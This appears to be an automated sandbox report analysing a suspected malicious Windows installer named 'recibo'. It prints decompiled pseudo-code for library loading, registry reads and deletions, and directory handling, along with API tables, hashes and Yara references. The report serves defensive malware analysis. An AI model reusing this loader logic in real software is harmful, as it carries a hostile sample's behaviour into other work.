				asm("sbb eax, 0x434fc0");
				 *(_t39 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x434f88 =  *0x434f88 +  *(_t39 - 4);
					return 0;
				}
				_t35 = E00402DA6(0xfffffff0);
				 *((intOrPtr*)(_t39 - 0x44)) = E00402DA6(1);
				if( *((intOrPtr*)(_t39 - 0x20)) == __ebx) {
					L3:
					_t23 = LoadLibraryExW(_t35, _t32, 8); // executed
					_t47 = _t23 - _t32;
					 *(_t39 + 8) = _t23;
					if(_t23 == _t32) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t36 = E00406979(_t47,  *(_t39 + 8),  *((intOrPtr*)(_t39 - 0x44)));
					if(_t36 == _t32) {
						E0040559F(0xfffffff7,  *((intOrPtr*)(_t39 - 0x44)));
					} else {
						 *(_t39 - 4) = _t32;
						if( *((intOrPtr*)(_t39 - 0x28)) == _t32) {
							 *_t36( *((intOrPtr*)(_t39 - 8)), 0x400, _t37, 0x40ce50, 0x40a000); // executed
						} else {
							E00401423( *((intOrPtr*)(_t39 - 0x28)));
							if( *_t36() != 0) {
								 *(_t39 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t39 - 0x24)) == _t32 && E00403B8C( *(_t39 + 8)) != 0) {
						FreeLibrary( *(_t39 + 8)); // executed
					}
					goto L16;
				}
				_t31 = GetModuleHandleW(_t35); // executed
				 *(_t39 + 8) = _t31;
				if(_t31 != __ebx) {
					goto L4;
				}
				goto L3;
			}










                                                                                  0x004020d8
                                                                                  0x004020d8
                                                                                  0x004020dd
                                                                                  0x004020e4
                                                                                  0x004021a3
                                                                                  0x004022f1
                                                                                  0x004022f1
                                                                                  0x00402c2a
                                                                                  0x00402c2d
                                                                                  0x00402c39
                                                                                  0x00402c39
                                                                                  0x004020f3
                                                                                  0x004020fd
                                                                                  0x00402100
                                                                                  0x00402110
                                                                                  0x00402114
                                                                                  0x0040211a
                                                                                  0x0040211c
                                                                                  0x0040211f
                                                                                  0x0040219c
                                                                                  0x00000000
                                                                                  0x0040219c
                                                                                  0x00402121
                                                                                  0x0040212c
                                                                                  0x00402130
                                                                                  0x00402170
                                                                                  0x00402132
                                                                                  0x00402135
                                                                                  0x00402138
                                                                                  0x00402164
                                                                                  0x0040213a
                                                                                  0x0040213d
                                                                                  0x00402146
                                                                                  0x00402148
                                                                                  0x00402148
                                                                                  0x00402146
                                                                                  0x00402138
                                                                                  0x00402178
                                                                                  0x00402191
                                                                                  0x00402191
                                                                                  0x00000000
                                                                                  0x00402178
                                                                                  0x00402103
                                                                                  0x0040210b
                                                                                  0x0040210e
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000

                                                                                  APIs
                                                                                  • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00402103
                                                                                    • Part of subcall function 0040559F: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsf321E.tmp\System.dll,00000000,004231B5,773423A0,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
                                                                                    • Part of subcall function 0040559F: lstrlenW.KERNEL32(00403418,Skipped: C:\Users\user\AppData\Local\Temp\nsf321E.tmp\System.dll,00000000,004231B5,773423A0,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
                                                                                    • Part of subcall function 0040559F: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsf321E.tmp\System.dll,00403418), ref: 004055FA
                                                                                    • Part of subcall function 0040559F: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsf321E.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsf321E.tmp\System.dll), ref: 0040560C
                                                                                    • Part of subcall function 0040559F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
                                                                                    • Part of subcall function 0040559F: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
                                                                                    • Part of subcall function 0040559F: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A
                                                                                  • LoadLibraryExW.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00402114
                                                                                  • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402191
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23383193231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383367093.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383724604.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383783900.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383856333.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383921037.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383984080.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                  • String ID:
                                                                                  • API String ID: 334405425-0
                                                                                  • Opcode ID: 0812a69665cf11e377adb3684f8a171474585e26745252b9346dd4e1bc3f05c7
                                                                                  • Instruction ID: d1cf9917c249e547a3b1759614bc69e8b445b1996c4dbd71fd6f6dd46acd7470
                                                                                  • Opcode Fuzzy Hash: 0812a69665cf11e377adb3684f8a171474585e26745252b9346dd4e1bc3f05c7
                                                                                  • Instruction Fuzzy Hash: 2A21C231904104FACF11AFA5CE48A9D7A71BF48358F20413BF605B91E1DBBD8A82965D
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0040259E Relevance: 4.5, APIs: 3, Instructions: 47registryCOMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 86%
                                                                                  			E0040259E(int* __ebx, intOrPtr __edx, short* __edi) {
				int _t10;
				long _t13;
				int* _t16;
				intOrPtr _t21;
				short* _t22;
				void* _t24;
				void* _t26;
				void* _t29;

				_t22 = __edi;
				_t21 = __edx;
				_t16 = __ebx;
				_t24 = E00402DE6(_t29, 0x20019);
				_t10 = E00402D84(3);
				 *((intOrPtr*)(_t26 - 0x10)) = _t21;
				 *__edi = __ebx;
				if(_t24 == __ebx) {
					 *((intOrPtr*)(_t26 - 4)) = 1;
				} else {
					 *(_t26 + 8) = 0x3ff;
					if( *((intOrPtr*)(_t26 - 0x20)) == __ebx) {
						_t13 = RegEnumValueW(_t24, _t10, __edi, _t26 + 8, __ebx, __ebx, __ebx, __ebx);
						__eflags = _t13;
						if(_t13 != 0) {
							 *((intOrPtr*)(_t26 - 4)) = 1;
						}
					} else {
						RegEnumKeyW(_t24, _t10, __edi, 0x3ff);
					}
					_t22[0x3ff] = _t16;
					_push(_t24); // executed
					RegCloseKey(); // executed
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t26 - 4));
				return 0;
			}











                                                                                  0x0040259e
                                                                                  0x0040259e
                                                                                  0x0040259e
                                                                                  0x004025aa
                                                                                  0x004025ac
                                                                                  0x004025b4
                                                                                  0x004025b7
                                                                                  0x004025ba
                                                                                  0x0040292e
                                                                                  0x004025c0
                                                                                  0x004025c8
                                                                                  0x004025cb
                                                                                  0x004025e4
                                                                                  0x004025ea
                                                                                  0x004025ec
                                                                                  0x004025ee
                                                                                  0x004025ee
                                                                                  0x004025cd
                                                                                  0x004025d1
                                                                                  0x004025d1
                                                                                  0x004025f5
                                                                                  0x004025fc
                                                                                  0x004025fd
                                                                                  0x004025fd
                                                                                  0x00402c2d
                                                                                  0x00402c39

                                                                                  APIs
                                                                                  • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025D1
                                                                                  • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 004025E4
                                                                                  • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsf321E.tmp,00000000,00000011,00000002), ref: 004025FD
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23383193231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383367093.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383724604.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383783900.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383856333.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383921037.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383984080.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Enum$CloseValue
                                                                                  • String ID:
                                                                                  • API String ID: 397863658-0
                                                                                  • Opcode ID: 2ceb002e910c094db02aea1c2c62d66cc74a7b046aa56edd155f21af9fce9564
                                                                                  • Instruction ID: 08080f496e1fbaad801da7c4a2f11cdf7a22a5a493a276a89d416976773fa01e
                                                                                  • Opcode Fuzzy Hash: 2ceb002e910c094db02aea1c2c62d66cc74a7b046aa56edd155f21af9fce9564
                                                                                  • Instruction Fuzzy Hash: 89017CB1A04105ABEB159F94DE58AAEB66CEF40348F10403AF501B61C0EBB85E44966D
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 02CC4E88 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 166libraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNELBASE(?,C9BF8E65,?,02CB291E), ref: 02CC361E
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23385776867.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_2cb0000_recibo.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: LibraryLoad
                                                                                  • String ID: vq
                                                                                  • API String ID: 1029625771-385929040
                                                                                  • Opcode ID: 6b5cd3f67ff7ab3f71bba099d0037acf9ec97ec04af4a08e0bc47406c3d615e7
                                                                                  • Instruction ID: 19caf94afc1b37fde6280baa76b20f7a5ac25811349976999914a868d0fb9dd8
                                                                                  • Opcode Fuzzy Hash: 6b5cd3f67ff7ab3f71bba099d0037acf9ec97ec04af4a08e0bc47406c3d615e7
                                                                                  • Instruction Fuzzy Hash: 5751CB75A00345CFCB259E38CD653DA3BA2AF56390FA4805EDC89CB304E7728A459B41
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 004015C1 Relevance: 3.1, APIs: 2, Instructions: 65COMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 86%
                                                                                  			E004015C1(short __ebx, void* __eflags) {
				void* _t17;
				int _t23;
				void* _t25;
				signed char _t26;
				short _t28;
				short _t31;
				short* _t34;
				void* _t36;

				_t28 = __ebx;
				 *(_t36 + 8) = E00402DA6(0xfffffff0);
				_t17 = E00405EB7(_t16);
				_t32 = _t17;
				if(_t17 != __ebx) {
					do {
						_t34 = E00405E39(_t32, 0x5c);
						_t31 =  *_t34;
						 *_t34 = _t28;
						if(_t31 != _t28) {
							L5:
							_t25 = E00405AEB( *(_t36 + 8));
						} else {
							_t42 =  *((intOrPtr*)(_t36 - 0x28)) - _t28;
							if( *((intOrPtr*)(_t36 - 0x28)) == _t28 || E00405B08(_t42) == 0) {
								goto L5;
							} else {
								_t25 = E00405A6E( *(_t36 + 8)); // executed
							}
						}
						if(_t25 != _t28) {
							if(_t25 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
							} else {
								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
								if((_t26 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						 *_t34 = _t31;
						_t32 = _t34 + 2;
					} while (_t31 != _t28);
				}
				if( *((intOrPtr*)(_t36 - 0x2c)) == _t28) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E0040653D(0x441000,  *(_t36 + 8));
					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
					if(_t23 == 0) {
						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
					}
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t36 - 4));
				return 0;
			}











                                                                                  0x004015c1
                                                                                  0x004015c9
                                                                                  0x004015cc
                                                                                  0x004015d1
                                                                                  0x004015d5
                                                                                  0x004015d7
                                                                                  0x004015df
                                                                                  0x004015e1
                                                                                  0x004015e4
                                                                                  0x004015ea
                                                                                  0x00401604
                                                                                  0x00401607
                                                                                  0x004015ec
                                                                                  0x004015ec
                                                                                  0x004015ef
                                                                                  0x00000000
                                                                                  0x004015fa
                                                                                  0x004015fd
                                                                                  0x004015fd
                                                                                  0x004015ef
                                                                                  0x0040160e
                                                                                  0x00401615
                                                                                  0x00401624
                                                                                  0x00401624
                                                                                  0x00401617
                                                                                  0x0040161a
                                                                                  0x00401622
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00401622
                                                                                  0x00401615
                                                                                  0x00401627
                                                                                  0x0040162b
                                                                                  0x0040162c
                                                                                  0x004015d7
                                                                                  0x00401634
                                                                                  0x00401663
                                                                                  0x004022f1
                                                                                  0x00401636
                                                                                  0x00401638
                                                                                  0x00401645
                                                                                  0x0040164d
                                                                                  0x00401655
                                                                                  0x0040165b
                                                                                  0x0040165b
                                                                                  0x00401655
                                                                                  0x00402c2d
                                                                                  0x00402c39

                                                                                  APIs
                                                                                    • Part of subcall function 00405EB7: CharNextW.USER32(?,?,0042FA70,?,00405F2B,0042FA70,0042FA70, 44w,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,77343420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405EC5
                                                                                    • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405ECA
                                                                                    • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405EE2
                                                                                  • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                                    • Part of subcall function 00405A6E: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405AB1
                                                                                  • SetCurrentDirectoryW.KERNELBASE(?,00441000,?,00000000,000000F0), ref: 0040164D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23383193231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383367093.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383724604.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383783900.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383856333.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383921037.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383984080.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                  • String ID:
                                                                                  • API String ID: 1892508949-0
                                                                                  • Opcode ID: e89a9e6a3f09ade376d0d4b3fd71c203f5cd3ef8be9bd613e1140dffb9deb40c
                                                                                  • Instruction ID: 910f9ca0e916fbda017ea5bccd1daba2d9720f9cae8b5c5670dceb894c5ef12e
                                                                                  • Opcode Fuzzy Hash: e89a9e6a3f09ade376d0d4b3fd71c203f5cd3ef8be9bd613e1140dffb9deb40c
                                                                                  • Instruction Fuzzy Hash: 3E11D031504110EBCF216FA5CD4099F36A0EF25369B28493BE945B52F1DA3E4A829A8E
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0040252A Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 84%
                                                                                  			E0040252A(int* __ebx, char* __edi) {
				void* _t17;
				short* _t18;
				void* _t35;
				void* _t37;
				void* _t40;

				_t33 = __edi;
				_t27 = __ebx;
				_t17 = E00402DE6(_t40, 0x20019); // executed
				_t35 = _t17;
				_t18 = E00402DA6(0x33);
				 *__edi = __ebx;
				if(_t35 == __ebx) {
					 *(_t37 - 4) = 1;
				} else {
					 *(_t37 - 0x10) = 0x800;
					if(RegQueryValueExW(_t35, _t18, __ebx, _t37 + 8, __edi, _t37 - 0x10) != 0) {
						L7:
						 *_t33 = _t27;
						 *(_t37 - 4) = 1;
					} else {
						if( *(_t37 + 8) == 4) {
							__eflags =  *(_t37 - 0x20) - __ebx;
							 *(_t37 - 4) = 0 |  *(_t37 - 0x20) == __ebx;
							E00406484(__edi,  *__edi);
						} else {
							if( *(_t37 + 8) == 1 ||  *(_t37 + 8) == 2) {
								 *(_t37 - 4) =  *(_t37 - 0x20);
								_t33[0x7fe] = _t27;
							} else {
								goto L7;
							}
						}
					}
					_push(_t35); // executed
					RegCloseKey(); // executed
				}
				 *0x434f88 =  *0x434f88 +  *(_t37 - 4);
				return 0;
			}








                                                                                  0x0040252a
                                                                                  0x0040252a
                                                                                  0x0040252f
                                                                                  0x00402536
                                                                                  0x00402538
                                                                                  0x0040253f
                                                                                  0x00402542
                                                                                  0x0040292e
                                                                                  0x00402548
                                                                                  0x0040254b
                                                                                  0x00402566
                                                                                  0x00402596
                                                                                  0x00402596
                                                                                  0x00402599
                                                                                  0x00402568
                                                                                  0x0040256c
                                                                                  0x00402585
                                                                                  0x0040258c
                                                                                  0x0040258f
                                                                                  0x0040256e
                                                                                  0x00402571
                                                                                  0x0040257c
                                                                                  0x004025f5
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00402571
                                                                                  0x0040256c
                                                                                  0x004025fc
                                                                                  0x004025fd
                                                                                  0x004025fd
                                                                                  0x00402c2d
                                                                                  0x00402c39

                                                                                  APIs
                                                                                  • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,00000033), ref: 0040255B
                                                                                  • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsf321E.tmp,00000000,00000011,00000002), ref: 004025FD
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23383193231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383367093.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383724604.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383783900.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383856333.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383921037.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383984080.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseQueryValue
                                                                                  • String ID:
                                                                                  • API String ID: 3356406503-0
                                                                                  • Opcode ID: dd1b1b3d94faa584660aa564dd852358c6c0cbefcfc3417a0db06bb84b323ca4
                                                                                  • Instruction ID: 3e5dab0bbcc9b7b4348569693e39c51bc0b27c59e8ea0ed6abb05ebc10b9b344
                                                                                  • Opcode Fuzzy Hash: dd1b1b3d94faa584660aa564dd852358c6c0cbefcfc3417a0db06bb84b323ca4
                                                                                  • Instruction Fuzzy Hash: 5F116D71900219EADF14DFA4DA589AE77B4FF04345B20443BE401B62C0E7B88A45EB5D
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 69%
                                                                                  			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x434f30;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x433eec =  *0x433eec + _t12;
						SendMessageW( *(_t18 + 0x18), 0x402, MulDiv( *0x433eec, 0x7530,  *0x433ed4), 0); // executed
					}
				}
				return 0;
			}











                                                                                  0x0040138a
                                                                                  0x004013fa
                                                                                  0x0040139b
                                                                                  0x004013a0
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004013a2
                                                                                  0x004013a3
                                                                                  0x004013ad
                                                                                  0x00000000
                                                                                  0x00401404
                                                                                  0x004013b0
                                                                                  0x004013b7
                                                                                  0x004013bd
                                                                                  0x004013be
                                                                                  0x004013c0
                                                                                  0x004013c2
                                                                                  0x004013b9
                                                                                  0x004013b9
                                                                                  0x004013ba
                                                                                  0x004013ba
                                                                                  0x004013c9
                                                                                  0x004013cb
                                                                                  0x004013f4
                                                                                  0x004013f4
                                                                                  0x004013c9
                                                                                  0x00000000

                                                                                  APIs
                                                                                  • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                  • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23383193231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383367093.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383724604.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383783900.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383856333.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383921037.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383984080.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend
                                                                                  • String ID:
                                                                                  • API String ID: 3850602802-0
                                                                                  • Opcode ID: d8feea9b0bd879c8f8267a4ec85e9a32d700cac98845316580bbb569ce856791
                                                                                  • Instruction ID: f98c5e72cab4da6dd47fcf147c12dc0649e5852bd482257a86ca63d172a8b8d6
                                                                                  • Opcode Fuzzy Hash: d8feea9b0bd879c8f8267a4ec85e9a32d700cac98845316580bbb569ce856791
                                                                                  • Instruction Fuzzy Hash: 0B01F4316202209FE7094B389D05B6A3698E710319F14823FF851F65F1EA78DC029B4C
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00402434 Relevance: 3.0, APIs: 2, Instructions: 39registryCOMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 100%
                                                                                  			E00402434(void* __ebx) {
				long _t7;
				void* _t10;
				void* _t14;
				long _t18;
				intOrPtr _t20;
				void* _t22;
				void* _t23;

				_t14 = __ebx;
				_t26 =  *(_t23 - 0x20) - __ebx;
				_t20 =  *((intOrPtr*)(_t23 - 0x2c));
				if( *(_t23 - 0x20) != __ebx) {
					_t7 = E00402E64(_t20, E00402DA6(0x22),  *(_t23 - 0x20) >> 1); // executed
					_t18 = _t7;
					goto L4;
				} else {
					_t10 = E00402DE6(_t26, 2); // executed
					_t22 = _t10;
					if(_t22 == __ebx) {
						L6:
						 *((intOrPtr*)(_t23 - 4)) = 1;
					} else {
						_t18 = RegDeleteValueW(_t22, E00402DA6(0x33));
						RegCloseKey(_t22);
						L4:
						if(_t18 != _t14) {
							goto L6;
						}
					}
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t23 - 4));
				return 0;
			}










                                                                                  0x00402434
                                                                                  0x00402434
                                                                                  0x00402437
                                                                                  0x0040243a
                                                                                  0x00402476
                                                                                  0x0040247b
                                                                                  0x00000000
                                                                                  0x0040243c
                                                                                  0x0040243e
                                                                                  0x00402443
                                                                                  0x00402447
                                                                                  0x0040292e
                                                                                  0x0040292e
                                                                                  0x0040244d
                                                                                  0x0040245d
                                                                                  0x0040245f
                                                                                  0x0040247d
                                                                                  0x0040247f
                                                                                  0x00000000
                                                                                  0x00402485
                                                                                  0x0040247f
                                                                                  0x00402447
                                                                                  0x00402c2d
                                                                                  0x00402c39

                                                                                  APIs
                                                                                  • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 00402456
                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 0040245F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23383193231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383367093.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383724604.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383783900.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383856333.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383921037.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383984080.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseDeleteValue
                                                                                  • String ID:
                                                                                  • API String ID: 2831762973-0
                                                                                  • Opcode ID: b75d323d86fa909671316af8d9fa67dfe1c8e59de469e028d3815ce869cacf85
                                                                                  • Instruction ID: 30df5d2aec36195d54007c6df5f336708121daf1b93815cec1e8c6dbc8099d71
                                                                                  • Opcode Fuzzy Hash: b75d323d86fa909671316af8d9fa67dfe1c8e59de469e028d3815ce869cacf85
                                                                                  • Instruction Fuzzy Hash: 22F0C232A00120EBDB11ABB89B4DAED72A8AF84314F15443BE141B71C0DAFC5D01866D
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00401EDE Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • ShowWindow.USER32(00000000,00000000), ref: 00401EFC
                                                                                  • EnableWindow.USER32(00000000,00000000), ref: 00401F07
                                                                                  Memory Dump Source
